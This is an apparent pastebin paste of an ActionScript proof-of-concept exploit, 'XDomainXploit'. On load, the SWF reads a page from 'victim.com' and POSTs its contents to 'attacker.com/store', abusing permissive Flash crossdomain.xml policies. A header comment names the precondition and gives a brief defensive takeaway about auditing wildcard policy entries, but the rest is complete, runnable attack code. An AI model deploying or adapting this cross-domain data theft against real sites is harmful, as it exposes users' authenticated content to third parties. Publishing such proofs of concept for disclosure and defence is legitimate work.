
Script

a guest Jan 28th, 2015 857 Never
  // Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
  // XDomainXploit.as
  //
  // Proof-of-concept SWF: reads one URL and, once the read completes, POSTs the
  // returned body to a second URL. Flash Player only hands a cross-domain
  // response to a SWF when the responding host's cross-domain policy file
  // (crossdomain.xml) admits the SWF's origin, so this flow depends on the
  // read target publishing a policy that is broader than it should be
  // (for example a wildcard allow-access-from entry).
  //
  // Defensive takeaway: list only specific, trusted origins in crossdomain.xml
  // and audit existing policy files for wildcard entries on any host that
  // serves authenticated or sensitive content.
  package {
      import flash.display.Sprite;
      import flash.events.*;
      import flash.net.URLLoader;
      import flash.net.URLRequest;
      import flash.net.URLRequestMethod;

      public class XDomainXploit extends Sprite {

          /**
           * Issues the initial read as soon as the SWF is instantiated and
           * registers onReadComplete for the COMPLETE event.
           */
          public function XDomainXploit() {
              // URL whose response body is read
              var sourceUrl:String = "http://victim.com/supersecret";
              var fetcher:URLLoader = new URLLoader();
              fetcher.addEventListener(Event.COMPLETE, onReadComplete);
              loadAndTrace(fetcher, new URLRequest(sourceUrl));
          }

          /**
           * COMPLETE handler for the initial read: copies the loaded data
           * (event.target.data) into the body of a POST to the second URL.
           */
          private function onReadComplete(event:Event):void {
              // URL that receives the retrieved data
              var sinkUrl:String = "http://attacker.com/store";
              var outbound:URLRequest = new URLRequest(sinkUrl);
              outbound.method = URLRequestMethod.POST;
              outbound.data = event.target.data;
              loadAndTrace(new URLLoader(), outbound);
          }

          /**
           * Calls loader.load(request) and traces any Error it throws.
           * Only errors thrown synchronously by load() are seen here; no
           * listeners for error events are registered on the loader.
           */
          private function loadAndTrace(loader:URLLoader, request:URLRequest):void {
              try {
                  loader.load(request);
              } catch (error:Error) {
                  trace("Error loading URL: " + error);
              }
          }
      }
  }